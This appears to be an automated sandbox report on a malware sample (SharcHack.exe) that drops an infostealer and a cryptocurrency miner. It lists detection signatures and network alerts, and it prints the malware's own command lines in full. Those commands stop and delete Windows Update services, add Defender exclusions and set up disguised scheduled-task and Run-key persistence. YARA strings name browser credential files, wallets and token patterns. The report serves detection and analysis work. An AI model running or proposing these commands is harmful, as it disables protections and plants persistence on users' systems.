7.0.v2.exe.aa0000.0.unpack	JoeSecurity_VEGAStealer	Yara detected VEGA Stealer	Joe Security
7.0.v2.exe.aa0000.0.unpack	JoeSecurity_AdesStealer	Yara detected Ades Stealer	Joe Security
7.0.v2.exe.aa0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.0.v2.exe.aa0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.0.v2.exe.aa0000.0.unpack	infostealer_win_lighting	Detect the Lighting infostealer based on specific strings	Sekoia.io	0x34ee4:$str0: \logins.json 0x3cf55:$str1: key3.db 0x3aa9d:$str2: \key4.db 0x3cf75:$str3: cert9.db 0x3aaaf:$str4: \places.sqlite 0x2b8af:$str5: 7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9 0x3ce6d:$str6: potentiallyVulnerablePasswords 0x3a0c5:$dll0: \mozglue.dll 0x3a0df:$dll1: \nss3.dll 0x393f4:$dll2: SbieDll.dll 0x3ba1b:$app01: Software\Valve\Steam 0x3c604:$app02: Telegram Desktop\tdata 0x3c8b2:$app03: \Wallets\Armory\ 0x3c912:$app04: \Wallets\Atomic\Local Storage\leveldb\ 0x3cb82:$app05: \Exodus\exodus.wallet\ 0x3ce17:$app06: \Wallets\Zcash\ 0x3a43f:$app07: uCozMedia\Uran 0x3a917:$app08: Comodo\IceDragon 0x3a93b:$app09: 8pecxstudios\Cyberfox 0x3a969:$app10: NETGATE Technologies\BlackHaw 0x3a9a7:$app11: Moonchild Productions\Pale Moon
7.0.v2.exe.aa0000.0.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x2e307:$str01: set_sUsername 0x2e7b7:$str02: set_sIsSecure 0x2fd2b:$str03: set_sExpMonth 0x31eae:$str04: WritePasswords 0x3205b:$str05: WriteCookies 0x326fc:$str06: sChromiumPswPaths 0x326e9:$str07: sGeckoBrowserPaths 0x3ab3f:$str08: Username: {1} 0x3ab5b:$str09: Password: {2} 0x3d7b8:$str10: encrypted_key":"(.*?)"
7.0.v2.exe.aa0000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x3b6f1:$f1: FileZilla\recentservers.xml 0x3473e:$b1: Chrome\User Data\ 0x347bc:$b1: Chrome\User Data\ 0x34822:$b1: Chrome\User Data\ 0x3a1b9:$b1: Chrome\User Data\ 0x3a239:$b1: Chrome\User Data\ 0x34e72:$b2: Mozilla\Firefox\Profiles 0x35159:$b4: Opera Software\Opera Stable\Login Data 0x35332:$b5: YandexBrowser\User Data\ 0x353be:$b5: YandexBrowser\User Data\ 0x35433:$b5: YandexBrowser\User Data\ 0x3a663:$b5: YandexBrowser\User Data\ 0x3cf55:$s1: key3.db 0x3aa9f:$s2: key4.db 0x3cf65:$s2: key4.db 0x34ee6:$s4: logins.json 0x3ce37:$s4: logins.json 0x3c9dc:$s7: wallet.dat 0x3ca0c:$s7: wallet.dat 0x3cad6:$s7: wallet.dat 0x3cd3d:$s7: wallet.dat
7.0.v2.exe.aa0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x3b4b5:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
7.0.v2.exe.aa0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x3c6da:$s1: \VPN\NordVPN 0x3c77e:$s1: \VPN\NordVPN 0x3c814:$s2: \VPN\OpenVPN 0x3c882:$s3: \VPN\ProtonVPN
7.0.v2.exe.aa0000.0.unpack	MALWARE_Win_A310Logger	Detects A310Logger	ditekSHen	0x397af:$s6: Content-Disposition: form-data; name="document"; filename=" 0x3cb36:$s11: \Ethereum\keystore 0x395a2:$v1_5: sharedSecret 0x3a167:$v1_6: ":"([^"]+)" 0x31eae:$v1_8: WritePasswords 0x326e9:$v1_9: sGeckoBrowserPaths 0x2d926:$v1_10: get_sPassword
34.2.updater.exe.7ff619210920.3.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
34.2.updater.exe.7ff619070000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
34.2.updater.exe.7ff619090700.2.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
34.2.updater.exe.7ff619210920.3.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 11 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f, ProcessId: 3176, ProcessName: cmd.exe

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC, CommandLine: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC, CommandLine|base64offset|contains: , Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1848, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC, ProcessId: 6464, ProcessName: schtasks.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 6176, ProcessName: powershell.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe, ProcessId: 3252, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 6176, ProcessName: powershell.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T22:21:00.024648+0100	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.5	58867	1.1.1.1	53	UDP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T22:20:09.749368+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	65.9.108.148	443	TCP
2024-12-28T22:20:11.410883+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	65.9.108.148	443	TCP
2024-12-28T22:20:13.426126+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	13.226.4.166	443	TCP
2024-12-28T22:20:16.405067+0100	2028371	3	Unknown Traffic	192.168.2.5	49712	65.9.108.148	443	TCP
2024-12-28T22:20:19.772976+0100	2028371	3	Unknown Traffic	192.168.2.5	49716	65.9.108.148	443	TCP
2024-12-28T22:20:22.562655+0100	2028371	3	Unknown Traffic	192.168.2.5	49720	13.226.4.166	443	TCP
2024-12-28T22:20:26.326871+0100	2028371	3	Unknown Traffic	192.168.2.5	49726	65.9.108.148	443	TCP
2024-12-28T22:20:28.816418+0100	2028371	3	Unknown Traffic	192.168.2.5	49737	13.226.4.166	443	TCP
2024-12-28T22:20:32.211814+0100	2028371	3	Unknown Traffic	192.168.2.5	49743	65.9.108.148	443	TCP
2024-12-28T22:20:34.892716+0100	2028371	3	Unknown Traffic	192.168.2.5	49749	13.226.4.166	443	TCP
2024-12-28T22:20:38.184365+0100	2028371	3	Unknown Traffic	192.168.2.5	49759	65.9.108.148	443	TCP
2024-12-28T22:20:40.986490+0100	2028371	3	Unknown Traffic	192.168.2.5	49766	13.226.4.166	443	TCP
2024-12-28T22:20:44.041813+0100	2028371	3	Unknown Traffic	192.168.2.5	49772	65.9.108.148	443	TCP
2024-12-28T22:20:46.781988+0100	2028371	3	Unknown Traffic	192.168.2.5	49778	13.226.4.166	443	TCP
2024-12-28T22:20:49.809690+0100	2028371	3	Unknown Traffic	192.168.2.5	49784	65.9.108.148	443	TCP
2024-12-28T22:20:52.463831+0100	2028371	3	Unknown Traffic	192.168.2.5	49793	65.9.108.148	443	TCP
2024-12-28T22:21:14.267209+0100	2028371	3	Unknown Traffic	192.168.2.5	49838	65.9.108.93	443	TCP
2024-12-28T22:21:18.184701+0100	2028371	3	Unknown Traffic	192.168.2.5	49849	65.9.108.93	443	TCP
2024-12-28T22:21:31.158290+0100	2028371	3	Unknown Traffic	192.168.2.5	49873	18.66.161.123	443	TCP
2024-12-28T22:21:36.603537+0100	2028371	3	Unknown Traffic	192.168.2.5	49887	65.9.108.93	443	TCP
2024-12-28T22:21:38.521343+0100	2028371	3	Unknown Traffic	192.168.2.5	49891	54.186.212.229	443	TCP
2024-12-28T22:21:39.438945+0100	2028371	3	Unknown Traffic	192.168.2.5	49896	3.165.135.3	443	TCP
2024-12-28T22:21:41.545301+0100	2028371	3	Unknown Traffic	192.168.2.5	49900	54.186.212.229	443	TCP
2024-12-28T22:21:42.672007+0100	2028371	3	Unknown Traffic	192.168.2.5	49903	65.9.108.93	443	TCP
2024-12-28T22:21:44.379806+0100	2028371	3	Unknown Traffic	192.168.2.5	49910	2.16.168.105	443	TCP
2024-12-28T22:21:45.353520+0100	2028371	3	Unknown Traffic	192.168.2.5	49911	3.165.135.3	443	TCP
2024-12-28T22:21:46.849187+0100	2028371	3	Unknown Traffic	192.168.2.5	49913	2.16.168.105	443	TCP
2024-12-28T22:21:47.479091+0100	2028371	3	Unknown Traffic	192.168.2.5	49919	65.9.108.93	443	TCP
2024-12-28T22:21:49.461500+0100	2028371	3	Unknown Traffic	192.168.2.5	49921	3.165.135.3	443	TCP
2024-12-28T22:21:50.311731+0100	2028371	3	Unknown Traffic	192.168.2.5	49922	54.186.212.229	443	TCP
2024-12-28T22:21:52.482130+0100	2028371	3	Unknown Traffic	192.168.2.5	49929	2.16.168.105	443	TCP
2024-12-28T22:21:54.648806+0100	2028371	3	Unknown Traffic	192.168.2.5	49936	2.16.168.105	443	TCP
2024-12-28T22:21:57.367844+0100	2028371	3	Unknown Traffic	192.168.2.5	49942	2.16.168.105	443	TCP
2024-12-28T22:21:58.545128+0100	2028371	3	Unknown Traffic	192.168.2.5	49943	65.9.108.93	443	TCP
2024-12-28T22:22:00.529844+0100	2028371	3	Unknown Traffic	192.168.2.5	49949	2.16.168.115	443	TCP
2024-12-28T22:22:01.134398+0100	2028371	3	Unknown Traffic	192.168.2.5	49951	3.165.135.3	443	TCP
2024-12-28T22:22:03.811939+0100	2028371	3	Unknown Traffic	192.168.2.5	49957	2.16.168.115	443	TCP
2024-12-28T22:22:05.973078+0100	2028371	3	Unknown Traffic	192.168.2.5	49964	2.16.168.115	443	TCP
2024-12-28T22:22:08.446424+0100	2028371	3	Unknown Traffic	192.168.2.5	49971	54.186.212.229	443	TCP
2024-12-28T22:22:10.667366+0100	2028371	3	Unknown Traffic	192.168.2.5	49981	2.16.168.115	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T22:22:25.620185+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	50016	104.20.94.94	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SharcHack.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	Avira: detection malicious, Label: HEUR/AGEN.1329655
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Avira: detection malicious, Label: HEUR/AGEN.1339346
Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	Avira: detection malicious, Label: PUA/OfferCore.Gen
Source: C:\Users\user\AppData\Local\Temp\3.exe	Avira: detection malicious, Label: HEUR/AGEN.1329655

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\CheatEngine75.exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\v2.exe	ReversingLabs: Detection: 83%
Source: C:\Windows\Temp\cfoutowi.tmp	ReversingLabs: Detection: 62%

Multi AV Scanner detection for submitted file

Source: SharcHack.exe	Virustotal: Detection: 77%			Perma Link
Source: SharcHack.exe	ReversingLabs: Detection: 81%

Yara detected BlackGuard

Source: Yara match	File source: 7.0.v2.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\v2.exe, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SharcHack.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: freegeoip.app

Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BC01A40 CryptReleaseContext,SIaa0f8e0c251cfd1d,	7_2_6BC01A40
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BCC69D0 SIffb8076c269e2a85,SI8b0d9e6837e61abc,SIffb8076c269e2a85,SI8b0d9e6837e61abc,CryptCreateHash,GetLastError,SIdb45e174afb28e2c,SI905dcc543d48caab,CryptHashData,GetLastError,SIdb45e174afb28e2c,SI905dcc543d48caab,CryptDeriveKey,GetLastError,SI9a326fe0ddbebf12,SI1bf8975e567ea97a,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,SIaa0f8e0c251cfd1d,SIaa0f8e0c251cfd1d,CryptDestroyKey,CryptDestroyHash,	7_2_6BCC69D0
Source: C:\Users\user\AppData\Local\Temp\v2.exe	Code function: 7_2_6BCCF920 sqlite3_cryptoapi_init,CryptReleaseContext,SIaa0f8e0c251cfd1d,CryptAcquireContextW,GetLastError,SIdb45e174afb28e2c,	7_2_6BCCF920

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 34.2.updater.exe.7ff619210920.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.updater.exe.7ff619070000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.updater.exe.7ff619090700.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.updater.exe.7ff619210920.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.2634403580.00007FF619210000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Temp\cfoutowi.tmp, type: DROPPED

Source: SharcHack.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

